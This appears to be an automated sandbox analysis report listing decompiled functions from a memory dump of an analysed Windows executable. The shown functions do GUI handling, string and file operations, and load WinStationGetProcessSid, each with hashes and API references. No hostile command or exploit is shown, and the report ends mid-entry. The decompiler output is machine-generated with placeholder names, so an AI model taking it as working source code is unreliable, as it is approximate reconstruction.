Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

q, xrefs: 00403556
cf@, xrefs: 0040352B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

0x00405e0a
0x00405e12
0x00405e18
0x00405e1c
0x00405e1e
0x00405e1e
0x00405e24
0x00405e2c
0x00405e2e
0x00405e44
0x00405e49
0x00405e4c
0x00405e4d
0x00405e68
0x00405e74
0x00405e74
0x00000000
0x00405e84
0x00405e8c

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

Y@, xrefs: 00409A46
WinStationGetProcessSid, xrefs: 00409A62
winsta.dll, xrefs: 00409A51

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x0040588e
0x0040588f
0x0040588f
0x00405892
0x00405896
0x004058a9
0x004058a9
0x004058ad
0x004058af
0x004058b5
0x004058b6
0x004058b9
0x004058c2
0x004058c3
0x004058c8
0x004058d2
0x004058d4
0x004058d9
0x004058e0
0x004058ea
0x004058ec
0x004058ed
0x004058f2
0x004058f9
0x00405902
0x00405898
0x00405898
0x0040589a
0x0040589c
0x004058a1
0x004058a2
0x004058a5
0x004058a7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004058a7
0x00405912
0x00405915
0x0040591e
0x0040591e
0x00405907
0x0040590b

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

0x0040ad06
0x0040ad0a
0x0040ad0c
0x0040ad14
0x0040ad19
0x0040ad1f
0x0040ad23
0x0040ad27
0x0040ad2a
0x0040ad2d
0x0040ad34
0x0040ad3b
0x0040ad3e
0x0040ad44
0x0040ad48
0x0040ad4a
0x0040ad52
0x0040ad5a
0x0040ad64
0x0040ad65
0x0040ad6b
0x0040ad6c
0x0040ad73
0x0040ad76
0x0040ad7c
0x0040ad7c
0x0040ad7f
0x0040ad84

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

0x00404a62
0x00404a6a
0x00404a6e
0x00404a71
0x00404a74
0x00404a92
0x00404a92
0x00404a76
0x00404a76
0x00404a87
0x00404a90
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404a90
0x00404aa3
0x00404aa7
0x00404aa7
0x00404a94
0x00404a98

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}

0x0040b6a6
0x0040b6ad
0x0040b6af
0x0040b6b0
0x0040b6b5
0x0040b6b6
0x0040b6bd
0x0040b6bf
0x0040b6c0
0x0040b6c5
0x0040b6c6
0x0040b6cd
0x0040b6cf
0x0040b6d0
0x0040b6d5
0x0040b6d6
0x0040b6dd
0x0040b6df
0x0040b6e0
0x00000000
0x0040b6e5
0x0040b6e6

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040B6B0
??3@YAXPAX@Z.MSVCRT ref: 0040B6C0
??3@YAXPAX@Z.MSVCRT ref: 0040B6D0
??3@YAXPAX@Z.MSVCRT ref: 0040B6E0

Memory Dump Source

Source File: 00000019.00000002.878856709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000019.00000002.878826185.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878909301.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.878954761.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.878993880.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
